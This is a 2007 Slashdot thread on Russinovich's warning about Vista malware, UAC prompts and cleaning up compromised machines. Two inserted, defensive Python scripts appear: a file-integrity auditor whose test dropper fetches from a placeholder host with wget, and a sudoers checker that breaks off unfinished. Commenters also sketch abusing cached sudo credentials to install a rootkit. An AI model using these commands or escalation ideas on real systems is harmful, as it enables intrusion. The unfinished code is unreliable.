
Russinovich Says, Expect Vista Malware

kdawson posted more than 7 years ago | from the UAC-be-damned dept.


Hypertwist writes "Despite all the anti-malware roadblocks built into Windows Vista, Microsoft technical fellow Mark Russinovich is lowering the security expectations, warning that viruses, password-stealing Trojans, and rootkits will continue to thrive as malware authors adapt to the new operating system. Even in a standard user world, he stressed that malware can still read all the user's data; can still hide with user-mode rootkits; and can still control which applications (anti-virus scanners) the user can access. From the article: '"We'll see malware developing its own elevation techniques," Russinovich said. He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'"


Actually (5, Funny)

Anonymous Coward | more than 7 years ago | (#18847865)

I'm really quite surprised by this.

Re:Actually (4, Interesting)

SEMW (967629) | more than 7 years ago | (#18848161)

Actually, I'm really quite surprised by this.
Quite surprised by what, that programs running in user-mode can still access the current user's data and programs in their home folder? Hardly news.

(I was slightly confused by the statement that programs "can still hide with user-mode rootkits", though -- surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself? I thought the whole point of a rootkit was that it allows malicious programs to maintain root (i.e. highest privilege) access undetected, which would make "user-mode rootkit" a bit of a contradiction in terms, unless I'm misunderstanding somewhere...?)

(And whilst I'm posting, "...a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file"? If it's a prompt that will give a malicious program elevated rights when the user clicks 'allow', what part of it is fake? Surely a fake/spoofed dialogue box wouldn't *actually* be able to grant elevated rights (pretty much by definition); and the text in the *real* elevation prompts can't be changed, since they run in 'secure desktop' sandbox mode, no?)

Re:Actually (2, Insightful)

Workaphobia (931620) | more than 7 years ago | (#18848427)

> "Quite surprised by what, that programs running in user-mode can still access the current user's data and programs in their home folder? Hardly news."

The GP was being extremely sarcastic. I'm sure most of the people who read this summary, or even just the title, thought "Duh" and wondered why an expert like Russinovich didn't have anything more insightful to say.

> "surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself?"

Well it wouldn't be able to hide itself from the root, but I don't see why it couldn't hide itself from other limited user apps.

> "If it's a prompt that will give a malicious program elevated rights when the user clicks 'allow', what part of it is fake?"

The fake part would be the premise under which it is requesting additional rights. Maybe it's masquerading in the dialog as a service the user already has.

I like the quote from the article: "Elevations are a convenience and not a security boundary".

Re:Actually (2, Informative)

TheCoelacanth (1069408) | more than 7 years ago | (#18848455)

(I was slightly confused by the statement that programs "can still hide with user-mode rootkits", though -- surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself? I thought the whole point of a rootkit was that it allows malicious programs to maintain root (i.e. highest privilege) access undetected, which would make "user-mode rootkit" a bit of a contradiction in terms, unless I'm misunderstanding somewhere...?)

"User-mode" usually refers to everything other than the kernel. Nothing prevents a user-mode program from gaining root access. Though admittedly, from the context, it doesn't seem like he meant that.

Re:Actually (2, Informative)

mrsteveman1 (1010381) | more than 7 years ago | (#18848819)

The real problem is the millions of users who blindly use the system without even the most basic understanding of how it works. You would not be surprised at the number of users who can't tell a real windows dialog box from a pop up on the web warning that you "need to scan your hard drive".

As long as people literally refuse to learn anything more than the bare minimum necessary to quickly read their email, nothing will change, especially with totally incompetent systems like windows vista, which is quite possibly the worst operating system I have ever used, save for some various conveniences like the segmented networking settings and file management/organization. Vista is "better than xp", but that is still horrible.

I understand that software should "just work", but at this point in Vista's case, it doesn't. You can either keep refusing to learn, or you can protect yourself. Is it worth it to blindly trust a company that has repeatedly shown they aren't deserving of trust? Or is it worth more to users to take a small amount of time to educate themselves about the system they trust to view banking records?

Re:Actually (1, Funny)

Anonymous Coward | more than 7 years ago | (#18849247)

> unless I'm misunderstanding somewhere...?

No, I think you're just misunderestimating Windows.

Re:Actually (4, Interesting)

Fhqwhgadss (905393) | more than 7 years ago | (#18849275)

surely if a rootkit is running with LUA privs, it wouldn't be able to hide itself?

Too bad there are lazy software companies pulling this kind of shit [chessok.com] . The developer's link to this piece of shit "patch" is listed under the headline "Convekta's products are compatible with Windows Vista !!!" (just disable the single most important security feature of the OS). I'd bet that over half of all Vista boxes will have LUA disabled within 12 months of installation. What do you have then? A new OS with the security enhancements removed and untested code running in "every user is a superuser" mode, just like XP without the 6 years of bugfixes. Don't tell me XP has limited accounts; using XP under a limited account takes more effort than using Linux ever did.

The only thing keeping the malware writers away from Vista so far is its piss-poor market penetration, not its security enhancements.

Re:Actually (3, Interesting)

lpw (1089731) | more than 7 years ago | (#18848483)

Providing a truly secure OS is antithetical to the Windoze Nature, i.e., that of an OS for dummies. Maintaining a secure system takes time, know-how, and sometimes even reading some fucking manual. But Microsoft's "operating systems" are intended for the PC, a platform where the majority of users are not willing to make that investment. Eventually, once the novelty of MS Paint wears off, a user needs to install another application in order to actually accomplish something useful on the PC. Because MS necessarily assumes that the user is a brain-dead clod, a simple scheme like the allow-or-deny elevation masquerade is necessary (and, of course, the user can be easily duped into installing malware). Anything more sophisticated, and the appeal (and usability) of Windoze to the masses suffers, because it's no longer "user friendly." After all, if grandma needs to dick around with file and process permissions, why not just install Linux? No version of Windoze will be a truly secure system until its user base becomes better educated, which is a requirement that Microsoft will never enforce to protect their bottom line.

Re:Actually (1)

JonathanR (852748) | more than 7 years ago | (#18848929)

No version of Windoze will be a truly secure system until its user base becomes better educated, which is a requirement that Microsoft will never enforce to protect their bottom line.

By definition, the user base of Windose will always wallow in mediocrity. Microsoft needs to take responsibility for this, if it wants to dominate the OS marketplace.

I think that MS missed their opportunity to make Vista really secure. They could have developed a brand new API, and sandboxed the old API in a virtual machine environment, to maintain backwards compatibility. Then publish decent standards for building applications, particularly with respect to file permissions, drivers etc, so developers can genuinely create robust applications that don't require administrative privileges to run. Enforce the standards by making them mandatory for using the OS installation mechanism. Enforce proper use of the correct installation mechanisms by disabling rogue installation hacks with system updates (i.e. deliberately break third party vendor's software if it's crap).

Re:Actually (2, Insightful)

drsmithy (35869) | more than 7 years ago | (#18849689)

By definition, the user base of Windose will always wallow in mediocrity. Microsoft needs to take responsibility for this, if it wants to dominate the OS marketplace.

"Wants to dominate" ? What _have_ they been doing then ?

I think that MS missed their opportunity to make Vista really secure. They could have developed a brand new API, and sandboxed the old API in a virtual machine environment, to maintain backwards compatibility.

Way, way too many negative tradeoffs. 99% of software would not be native and its functionality would suffer significantly.

Then publish decent standards for building applications, particularly with respect to file permissions, drivers etc, so developers can genuinely create robust applications that don't require administrative privileges to run.

What's wrong with the current ones, that have been around for more than a decade ? Hell, what's wrong with just good old common sense and decent developer practices ?

No developer has had any excuse for releasing software that needlessly requires Administrator privileges for at least 8-9 years. None.

Enforce the standards by making them mandatory for using the OS installation mechanism. Enforce proper use of the correct installation mechanisms by disabling rogue installation hacks with system updates (i.e. deliberately break third party vendor's software if it's crap).

Oh yeah. Microsoft deliberately breaking third party software. I can just imagine how well that will go over, given the flak they cop when they _accidentally_ break some random piece of software.

Good plan you've got there, tiger. If you were lucky, you might have even managed to get all of it spoken in a product design meeting without being laughed out of the room.

This isn't the open source world where developers can just go around breaking shit willy-nilly to make end users conform to some arbitrary plan for the hell of it (despite many people here insisting to the contrary).

Security through obscurity (4, Funny)

EmbeddedJanitor (597831) | more than 7 years ago | (#18848629)

Well, to hack/infect/trojan a Vista system you first have to find one. Considering the high switchback rate to XP that's going to be harder than previously expected.

Re:Actually (3, Interesting)

313373_bot (766001) | more than 7 years ago | (#18848851)

What if Microsoft wrote a new OS, and no one bothered writing applications for it, not even malware? Despite all the ineffective security and bad design decisions, the prevalence of viruses, trojans and spyware on previous Windows versions was (and is) in part due to their sizable market share. If Vista Me II isn't being attacked like old Windows, is it because it's so much more secure, or is it because no one cares? Only time will tell, but I can't take off my mind the image of a mighty tree falling in the middle of a forest, with no one to hear it.

Free screensaver !! (2, Insightful)

Anonymous Coward | more than 7 years ago | (#18847907)

With companies like ask.com (who run SmileyCentral, a well-known spyware site) nothing will change.

just click on setup.exe and you can have this fantastic free screensaver, be the envy of your friends !

Re:Free screensaver !! (1)

Adambomb (118938) | more than 7 years ago | (#18847983)

No Way!

In other news.. (1)

renegadesx (977007) | more than 7 years ago | (#18848501)

Expect Vista exploits!!! OMG!

Why the, extra comma? (-1, Troll)

Anonymous Coward | more than 7 years ago | (#18847909)

Is this, a new writing style?

Re:Why the, extra comma? (1)

dsanfte (443781) | more than 7 years ago | (#18848089)

Commas represent pauses in speech. Speaking that headline, you'd pause in exactly the same place.

Re:Why the, extra comma? (2, Informative)

vux984 (928602) | more than 7 years ago | (#18848141)

The comma isn't extra:
Proper punctuation for a sentence like this is:

Someone said, "Something that they said goes here."

A comma is supposed to precede the quote. If anything, one might ask why the headline is missing the quotes. :)

Re:Why the, extra comma? (1)

dsanfte (443781) | more than 7 years ago | (#18848245)

The comma isn't extra:

I never said it was.

Re:Why the, extra comma? (2, Funny)

Petrushka (815171) | more than 7 years ago | (#18848463)

Oh, that's easy: because it takes a lot longer to type &quot; ... &quot; than it takes to type " ... " into the <title> tag. (Though that's still not as long as it took me to type this comment.)

Well, no shit (4, Funny)

hairykrishna (740240) | more than 7 years ago | (#18847939)

In similar news, despite a wide variety of new content, online pornography remains disproportionately popular.

Re:Well, no shit (1)

seaturnip (1068078) | more than 7 years ago | (#18848743)

Actually no, it's in relative decline [economist.com] .

The "anti" strikes again. (2, Funny)

Anonymous Coward | more than 7 years ago | (#18847985)

"He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.'"

Good thing geeks are anti-social.

Vista malware (5, Funny)

psaunders (1069392) | more than 7 years ago | (#18847987)

Russinovich Says, Expect Vista Malware

Old news. Vista has been available for months now.

ATTN: SWITCHEURS! (-1, Troll)

Anonymous Coward | more than 7 years ago | (#18848265)

If you don't know what Cmd-Shift-1 and Cmd-Shift-2 are for, GTFO.
If you think Firefox is a decent Mac application, GTFO.
If you're still looking for the "maximize" button, GTFO.
If the name "Clarus" means nothing to you, GTFO.

Bandwagon jumpers are not welcome among real [imageshack.us] Mac [imageshack.us] users [imageshack.us] . Keep your filthy, beige [imageshack.us] PC fingers to yourself.

Smilies (4, Funny)

yotto (590067) | more than 7 years ago | (#18848025)

So you're telling me I shouldn't have installed these smilies? Here, let me try a typical smiley face. :-@*&^^^ NO CARRIER

Re:Smilies (1)

MadnessASAP (1052274) | more than 7 years ago | (#18848631)

That's not funny. I had a neighbor whose computer I would fix on a regular basis, and she insisted on using IE6 and installing that god damn smiley toolbar. She also once fell for one of those BS anti-virus programs you see on the internet, the ones that actually fill your computer with spam. Fortunately for me she moved.

And ... ? (5, Interesting)

khasim (1285) | more than 7 years ago | (#18848029)

So now you know that Vista can be compromised ... what are you doing about it?

Where's the clean boot disk that I can use to scan a Vista box? How do I validate all the files on it?

What is your answer to AFTER the box has been cracked?

Re:And ... ? (2, Interesting)

Anonymous Coward | more than 7 years ago | (#18848145)

To be fair, Vista's ultimate solution is probably no different from any other system:

Nuke it from orbit, reinstall.

The only difference is the hope they don't deny your registration after doing that too many times.

I suppose they could have a "Boot from CD and validate" option, but, because of subsequent system changes as the user installs drivers and other legitimate software (which could still include bogus stuff), it would probably be tricky to implement except for a few key system files that don't (or shouldn't) ever change, and that would miss a lot of malware. More useful would be if it were possible to create a "known good" system image, and a way to compare that to the present state of the system or to reinstall that image. I know that XP has system save points (or whatever they are called), but I'm thinking about something more comprehensive. Do they have anything like that yet?

Re:And ... ? (1)

SLi (132609) | more than 7 years ago | (#18848153)

People in the Windows world seem to ignore this until it becomes painfully obvious to them, but the only guaranteed solution to an administrator- or system-level compromise, and the only solution real experts would offer (which I'm really glad is understood in the Unix world!) if it were of any importance that the malware be completely eradicated from your computer, is a full reinstall or a restore from backups made before the compromise. Anything less than that and there is a way the malware can evade.

I know it's painful. But it's the only way. Admin or system level compromise is not a routine matter, no matter how much some people like to portray it as such.

Not necessarily. (5, Interesting)

khasim (1285) | more than 7 years ago | (#18848253)

I can boot with a LiveCD and mount the hard drive so that NONE of its files are being run.

Then I simply match each and every file on the hard drive to the package that it should have come from and validate the md5 checksum.

Any file that is NOT accounted is suspect and can be individually evaluated. Most of them should be data files that are not executable.

Remember, in Linux, everything is a file and the boot process is very clearly defined. If something is running on your machine, you can find what it is and why it is running.

Any system that REQUIRES a complete tear down after ANY vulnerability is exploited is NOT a well designed system. There has to be a way to validate each section of the system.

Re:Not necessarily. (1, Interesting)

SLi (132609) | more than 7 years ago | (#18848365)

In theory, yes, you can do that. In reality though in any reasonable system quite a number of configuration files have been modified, and the users have stuff in their home directories that does not directly come from any installation CD that could be used for at least a user-level exploit (which makes a root exploit dramatically easier). In such a system it is generally quite a bit less work actually to do a reinstall and reconfiguration than combing all the files with the kind of comb you need to catch all things evil. It's like trying to find the proverbial needle in the haystack, except that the needles have been deliberately hidden and you don't know how many there are – and if you miss one, you lose.

Read what I had posted, okay? (4, Insightful)

khasim (1285) | more than 7 years ago | (#18848457)

In reality though in any reasonable system quite a number of configuration files have been modified, and the users have stuff in their home directories that does not directly come from any installation CD that could be used for at least a user-level exploit (which makes a root exploit dramatically easier).

I had already addressed that.

I had said:
"Any file that is NOT accounted is suspect and can be individually evaluated. Most of them should be data files that are not executable."

Again, you should be able to automatically validate the system files, then you manually check the others. Those others include the config files, user files and so on.

In such a system it is generally quite a bit less work actually to do a reinstall and reconfiguration than combing all the files with the kind of comb you need to catch all things evil.

If that were correct then your newly installed box would be cracked as soon as those user files were restored.

And, yes, they will need to be restored.

So, in EITHER case those files will have to be checked for "all things evil".

But in my scenario, the box is validated FASTER and you can identify the files that were added/replaced.

More importantly, you can validate whether the box WAS compromised.

It's like trying to find the proverbial needle in the haystack, except that the needles have been deliberately hidden and you don't know how many there are - and if you miss one, you lose.

I take it that you don't work on Linux boxes much.

There are a finite number of files on the box. And EVERYTHING is a file.

The more of them that you can automatically validate, the smaller the number of files that you have to search through. This isn't magic. It's something called "Computer Science".

In your scenario, you rebuild the box, restore the users' files ... and you've just been compromised again.
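Added example, not code from any poster in this thread: the offline audit khasim describes (boot from a LiveCD, mount the disk so nothing on it is running, match every file against a known-good manifest, and hand-check whatever is unaccounted for), which is also the "known good image compared to the present state" the earlier Anonymous Coward asked about. The script hashes a mounted tree with SHA-256 rather than MD5 (MD5 collisions are cheap to produce, so a manifest built on it can be defeated), records symlinks by target instead of following them, classifies every path as ok / modified / added / missing, and flags added files that carry an execute bit so the "data files that are not executable" get looked at last. The sample "clean" and "suspect" trees in `demo()` are constructed in a temp directory; in real use the manifest is built from the package database or a pristine install and kept off the audited disk.

```python
"""Offline integrity audit of a mounted, non-running filesystem against a
known-good manifest (added example; the sample trees below are constructed)."""
import hashlib
import os
import shutil
import stat
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path -> digest for every regular file under root.
    Symlinks are recorded by their target rather than followed, so a link
    repointed at attacker-controlled content shows up as 'modified'."""
    root = Path(root)
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):  # followlinks=False
        dirnames.sort()
        for name in sorted(filenames):
            p = Path(dirpath) / name
            rel = p.relative_to(root).as_posix()
            if p.is_symlink():
                manifest[rel] = "symlink:" + os.readlink(p)
            elif p.is_file():
                manifest[rel] = sha256_file(p)
    return manifest


def verify_tree(root, manifest):
    """Compare the current state of root with a known-good manifest."""
    current = build_manifest(root)
    report = {"ok": [], "modified": [], "added": [], "missing": [], "suspicious": []}
    for rel, digest in manifest.items():
        if rel not in current:
            report["missing"].append(rel)
        elif current[rel] != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    report["added"] = sorted(set(current) - set(manifest))
    # Unaccounted files with an execute bit deserve a look before plain data files.
    for rel in report["added"]:
        p = Path(root) / rel
        if not p.is_symlink() and p.stat().st_mode & stat.S_IXUSR:
            report["suspicious"].append(rel)
    for key in ("ok", "modified", "missing"):
        report[key].sort()
    return report


def demo():
    """Constructed sample: a clean 'install', then a tampered copy of it."""
    base = Path(tempfile.mkdtemp())
    try:
        clean = base / "clean"
        (clean / "usr" / "bin").mkdir(parents=True)
        (clean / "etc").mkdir()
        (clean / "usr" / "bin" / "ls").write_bytes(b"\x7fELF real ls")
        (clean / "usr" / "bin" / "ps").write_bytes(b"\x7fELF real ps")
        (clean / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        os.symlink("ls", clean / "usr" / "bin" / "dir")
        known_good = build_manifest(clean)  # would be saved off-disk in practice

        suspect = base / "suspect"
        shutil.copytree(clean, suspect, symlinks=True)
        (suspect / "usr" / "bin" / "ps").write_bytes(b"\x7fELF trojaned ps")  # modified
        (suspect / "etc" / "hosts").unlink()                                   # missing
        (suspect / "tmp").mkdir()
        dropper = suspect / "tmp" / ".x"
        dropper.write_bytes(b"#!/bin/sh\nwget http://example.invalid/\n")      # added, executable
        dropper.chmod(0o755)
        (suspect / "etc" / "motd").write_text("welcome\n")                     # added, plain data
        return verify_tree(suspect, known_good)
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind:10s} {files}")
```

Run against a real mount, `build_manifest` is pointed at the mounted disk and the manifest comes from a pristine install (or, on a package-managed system, from the package database), not from the disk being audited. Config files and home directories will always land in `added` or `modified`; the value of the exercise is that the system binaries are cleared automatically, leaving a short list to read by hand.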

Re:Read what I had posted, okay? (1)

Watson Ladd (955755) | more than 7 years ago | (#18848923)

That's not computer science. That's systems administration. And not everything is a file in Unix. Everything is a file in Plan 9. Although automatic validation will not fix the problem of misconfiguration. If you have been 0wnd, you should see what you forgot to patch, and what configuration mistakes you made.

Re:Read what I had posted, okay? (0)

Anonymous Coward | more than 7 years ago | (#18849223)

And not everything is a file in Unix.

Like what?

Re:Read what I had posted, okay? (0)

Anonymous Coward | more than 7 years ago | (#18849791)

Berkeley sockets?

Re:Read what I had posted, okay? (2, Insightful)

Daengbo (523424) | more than 7 years ago | (#18849661)

In my opinion, you have just highlighted the strength of the average package system in Linux vs. the binary patch system some people would like to go to. Making a hash comparison is easy in the first case but either more difficult by a magnitude or just impossible, depending on how the patch is done, I guess.

As much as moving to a binary patch system would save bandwidth, I find the .deb, .rpm, and .tgz packages to have significant strengths.

Re:Not necessarily. (0)

Anonymous Coward | more than 7 years ago | (#18848407)

That works. You're comparing a known good install to a suspect system in such a way that you know the comparison is good. However, two points:

(1) How do you know that the CD has booted up with clean code? How do you know that the malware hasn't infiltrated the code that runs before the CD bootstrap is read? (BIOS or equivalent) Yes, the odds are very good it hasn't ... but how do you know?

(2) How much time is such a comparison going to take? Would it be quicker to just nuke and re-install?

Re:Not necessarily. (1)

QuantumG (50515) | more than 7 years ago | (#18848561)

If they've owned your BIOS, reinstalling won't help.

Flash BIOS exploits (1)

jmorris42 (1458) | more than 7 years ago | (#18848761)

> If they've owned your BIOS, reinstalling won't help.

Something I'm surprised doesn't actually happen more often.

But even if it ever does, I'm as ready as I can be for it. I write protect the BIOS wherever possible, and it is usually possible.

I really like the Gigabyte DualBios feature as well, for a belt & suspenders approach. You can't write the BIOS without keyboard intervention during POST and even IF you screw up or opt to enable writes (I guess the Windoze folk prefer the GUI update util) you can still reboot, hit a hotkey and with a few keystrokes get back to a known good BIOS.

A lot of other reputable hardware makers at least give you a BIOS rescue mode of some sort: just enough smarts in a protected space that you hold a key / move a jumper and it blindly flashes from a floppy. Prefer those vendors, for sooner or later somebody IS going to make a serious run at BIOS. Of course we tend to ignore the OTHER flashable parts, most optical drives and even some HD drives. Yet to see a drive with a flash write protect jumper.

Re:Flash BIOS exploits (2, Interesting)

QuantumG (50515) | more than 7 years ago | (#18848811)

Hmm.. wonder if you could flash a CD-ROM drive to run arbitrary code on start-up.. presumably yes.

Re:Flash BIOS exploits (1)

Joe The Dragon (967727) | more than 7 years ago | (#18849543)

It's better to flash a video card or other PCI-E / PCI card, as they can have their ROMs loaded before the OS starts up.

Re:And ... ? (4, Insightful)

QuantumG (50515) | more than 7 years ago | (#18848257)

I love the way people say "you need to reinstall" .. as if you're going to do better building the box to be secure this time.

Re:And ... ? (2, Insightful)

SLi (132609) | more than 7 years ago | (#18848381)

Well, you had better, because if you don't, you'll have to go through the same again. Many people learn from their mistakes, fortunately. Reasonable security even on Windows is not that hard, if you take the steps before the compromise.

Re:And ... ? (0)

Anonymous Coward | more than 7 years ago | (#18848419)

I haven't seen anyone in the Windows world who ignores that. Every security professional, Windows or Linux, that I've ever met has said exactly what you did: the only way to ensure that you've completely eliminated a root-level compromise is to reinstall from scratch and restore from a known-good backup. (The part about "known-good" backups is the tricky part, since most compromises lie dormant for weeks or months before they are activated. Simply choosing the last full backup before your box started launching DoS attacks isn't sufficient.)

The reason that most machines are "fixed" instead of rebuilt is based on something else you said:

it were of any importance that the malware be completely eradicated from your computer

Generally speaking, it's not of importance. Partially that's because hackers usually go after the low-hanging fruit, and a system that's been "fixed" and secured (more than it was before, anyway) is no longer low-hanging fruit. The hacker could perhaps get back in if he devoted any attention to the matter, but with literally millions of other boxes he could hack with no special effort at all, why bother?

The general strategy for security is to look at your server and figure out how much of a target you're going to be. Then you secure the server just enough to make it harder to crack than comparable machines. A good hacker who's targeting you in particular will still be able to get in, but nothing you can possibly do will change that anyway. And the more secure your system is, the more of a pain in the ass it is for its rightful users to access. The trick is knowing where to draw the line, and it's what separates good security professionals from bad ones. (Tip for managers who may be reading this: Good security people will get hacked sometimes, because bad security people will lock down systems to the point of utter uselessness. Their machines will be immune to compromise, but they'll also be immune to productive work.)

Re:And ... ? (3, Funny)

WrongSizeGlass (838941) | more than 7 years ago | (#18848181)

What is your answer to AFTER the box has been cracked?

I've found that super glue works pretty well, but nothing is as good as blue duct tape. Blue duct tape rules.

Re:And ... ? (1)

alshithead (981606) | more than 7 years ago | (#18849335)

"I've found that super glue works pretty well, but nothing is as good as blue duct tape. Blue duct tape rules."

Your duct tape has been hacked. Duct tape does not come in blue. The blue tape is masking tape for painting. Yes, it does stick very goodly...but by that fact alone it is not duct tape. Real duct tape is gray or silver and DOES NOT stick nearly as goodly to some surfaces.

Re:And ... ? (1, Informative)

SpaceLifeForm (228190) | more than 7 years ago | (#18848187)

Rename files containing 'install' to something else.

Link [theregister.co.uk]

The height of stupidity from Microsoft.
Will they be able to top it?

Re:And ... ? (1)

zcat_NZ (267672) | more than 7 years ago | (#18849677)

Not enough. Vista looks at things other than the filename to decide if your program is an installer, and I've heard that it's infuriatingly good at recognizing them too. So if you want to take a look at some potentially interesting but not fully trusted program, setting it up in a special 'sandbox' login just to try it out is just not an option. You're just going to have to let the installer have access to your entire system, like it or not.

Duh! (4, Funny)

Cervantes (612861) | more than 7 years ago | (#18848049)

From the "No fucking shit, sherlock" file...

Malware writers will write malware for the latest OS? And they'll try and find ways around the blocks? And in the millions of lines of code, they'll find a weakness and succeed? Holy shit, I never would have guessed!!

Seriously, sometimes when I read Slashdot, a small part of my brain cries out in pain, and then is silent forever.

Duh!-Not here. (0)

Anonymous Coward | more than 7 years ago | (#18848101)

"Malware writers will write malware for the latest OS? And they'll try and find ways around the blocks? And in the millions of lines of code, they'll find a weakness and succeed? Holy shit, I never would have guessed!!"

Except when talking about Linux of course.

Re:Duh! (0)

Anonymous Coward | more than 7 years ago | (#18848247)

Seriously, sometimes when I read Slashdot, a small part of my brain cries out in pain, and then is silent forever.

Will you let us know when the typing part of your brain goes silent forever?

Re:Duh! (4, Funny)

Workaphobia (931620) | more than 7 years ago | (#18848449)

> "Seriously, sometimes when I read Slashdot, a small part of my brain cries out in pain, and then is silent forever."

This was only the first in a sequence of articles, the next being "Hackers can break into unsecured wireless routers."

The Jedis are going to feel this one.

yeah, but look who's saying it! (1)

ummit (248909) | more than 7 years ago | (#18848603)

Yeah, yeah, obvious as hell, but the surprise here -- and it's a pretty huge one -- is that someone from Microsoft is saying this. What's up with that?

Re:yeah, but look who's saying it! (1)

evilviper (135110) | more than 7 years ago | (#18848947)

Don't worry. He's just new there. He'll become utterly detached from reality soon enough.

Re:Duh! (1)

drsmithy (35869) | more than 7 years ago | (#18849887)

Malware writers will write malware for the latest OS? And they'll try and find ways around the blocks? And in the millions of lines of code, they'll find a weakness and succeed? Holy shit, I never would have guessed!!

The only "weakness" the majority of malware succeeds against is the weakness of the user to do whatever it asks them to so they can watch porn, get new smileys, win an ipod, etc.

Hey, Russinovich (3, Insightful)

Ranger (1783) | more than 7 years ago | (#18848109)

Vista is Malware!

Standard plug-in joke #3: (4, Funny)

Black Parrot (19622) | more than 7 years ago | (#18848111)

In Russinovich, malware attacks Vista.

An Expected Approach (5, Insightful)

gooman (709147) | more than 7 years ago | (#18848117)

He demonstrated a social engineering attack scenario where a fake elevation prompt can be used to trick users into clicking "allow" to give elevated rights to a malicious file.

That is the scenario I have been envisioning since I first installed RC1. Microsoft is conditioning users to agree to about anything by having so many intrusive pop-ups. People just want to get on with their computing experience. Maybe they will read the warning a few times at first, but after a short while they just respond without reading because that is how they get to the next step. Of course malware writers will use this method, it is almost as if Microsoft has given them a gift.

Re: An Expected Approach (1)

Ephemeriis (315124) | more than 7 years ago | (#18848389)

That's something that I noticed almost immediately when I installed Vista. I guess I don't know how it would be for your typical home user, but the things I was trying to do kept asking me for permission. Had to click OK to install software...had to click OK to change network settings...had to click OK to change firewall/filesharing settings when it detected a new network...had to intentionally run the command prompt with administrative rights, and then click OK to allow it... Maybe your average user wouldn't see it so much, maybe they would, but it got to the point where I wasn't even reading the warnings anymore.

By contrast, Ubuntu asks you relatively seldom. At the command prompt I'm frequently having to sudo stuff, but it just asks for your password, you don't get asked if it's OK or not. Synaptic asks for permission...a few system changes do...installing software usually does... But I got the OK prompt a dozen times a day with Vista, compared to once or twice with Ubuntu.

Macs also prompt the user for administrative operations...but again, it's far less frequent than Vista.

Re: An Expected Approach (1)

VertigoAce (257771) | more than 7 years ago | (#18848553)

Vista just asks me for my password. I haven't seen this cancel or allow prompt in months. When I need admin access for a task I have to type in an admin password. The kinds of tasks that require admin access in Vista seem to be more or less the same as those in Linux that require root.

Basically, the behavior you are seeing is that you are taking a shortcut and running as root all the time. Any time you actually need to be an admin it'll ask for your permission, but not require a password, since you already logged on as an admin. You really shouldn't be running in this mode. I tend to name the first account "Admin" and immediately create my own user account. I never directly log in as Admin, just like I never have a full KDE session as root.

I think the main situation where people are seeing these prompts unexpectedly is with hard drives that were configured under XP to be writable only by admins. If you don't change the permissions before using Vista, standard users won't have write access. You'll run into the same problem pretty easily under Linux (mounting a drive with every file owned by root with 0755 permissions).

Re: An Expected Approach (1)

gutnor (872759) | more than 7 years ago | (#18848741)

First, I don't have Vista and I don't plan to have it.

However, I assume that in a sane environment, the user should be asked when it installs software (at least software that registers some system-wide stuff, which is pretty much everything in the Windows world), changes firewall/antivirus settings, network config, ... unless it runs in administrative mode of course.

When people talk about the confirmation box, I suppose they run in user mode, where it makes sense to elevate a process's privilege when running 'admin' stuff. Not the best feature, but a nice user-friendly transition option for people who have been using their computer in Admin mode since they have had one.

If you are still running Vista in Administrator mode by default, either you or Microsoft (for not defaulting to that type of installation mode) screwed up somewhere. Warning boxes in Administrative mode are little more useful for security than a sign 'don't jump' next to a cliff.

Re: An Expected Approach (1)

Daengbo (523424) | more than 7 years ago | (#18849741)

What's kind of scary on Ubuntu is the sudo and gksudo timeout. If you invoke gksudo to gain administrative privileges one time, then you don't have to type the password in again for a few minutes. What if a piece of malware invokes a program like update-manager which asks for your password, then immediately follows up with "gksudo cp ./bash /bin/bash" and gets sudo privileges? Sounds dangerous to me, and not different from the Vista problem highlighted in TFA.

Re: An Expected Approach (1)

Daengbo (523424) | more than 7 years ago | (#18849811)

Bad form replying to myself, but I realized that the user-level program could just monitor the system and wait for gksudo to be called by the user, then call it again almost immediately to install a rootkit. Much simpler and more foolproof than trying to spoof something.
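The two posts above hinge on sudo's credential cache: once a password has been entered, sudo (and gksudo, which calls sudo underneath) keeps accepting commands without one until the timestamp expires. As an added example that is not part of the thread, here is a small Python audit of that setting. It parses constructed sudoers fragments (not copied from any real system) and reports the effective `timestamp_timeout` for a user, so an admin can see whether the window described above exists and how long it is. The user names in the fragments are assumptions for the example.

```python
import re

# Constructed sudoers fragment: caching left at the build default, so a password
# entered once keeps working for the following minutes from the same terminal.
SUDOERS_CACHING = """\
Defaults        env_reset
Defaults        mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
"""

# Constructed hardened fragment: timestamp_timeout=0 makes sudo ask every time;
# the per-user line gives alice (an assumed user) a two-minute window instead.
SUDOERS_HARDENED = """\
Defaults        env_reset, timestamp_timeout=0
Defaults:alice  timestamp_timeout=2
%sudo   ALL=(ALL:ALL) ALL
"""

# "Defaults" optionally followed by a scope: ":user", "@host", ">runas" or "!command".
DEFAULTS_RE = re.compile(r"^Defaults(?P<scope>[:@>!]\S+)?\s+(?P<opts>.+)$")


def _logical_lines(text):
    """Join backslash-continued lines and strip comments, as sudoers does.
    (#include directives are dropped too, so included files are not followed.)"""
    joined = text.replace("\\\n", " ")
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def timestamp_timeouts(text):
    """Return {scope: minutes}; scope "" is the unscoped Defaults line.
    A later entry for the same scope overrides an earlier one, as in sudoers."""
    found = {}
    for line in _logical_lines(text):
        m = DEFAULTS_RE.match(line)
        if not m:
            continue
        scope = m.group("scope") or ""
        for opt in m.group("opts").split(","):
            opt = opt.strip()
            if opt.startswith("timestamp_timeout="):
                found[scope] = float(opt.split("=", 1)[1])
    return found


def effective_timeout(text, user):
    """Timeout in minutes that applies to `user`: a ":user" entry beats the global one.
    None means the option is unset and sudo's compiled-in default window applies."""
    found = timestamp_timeouts(text)
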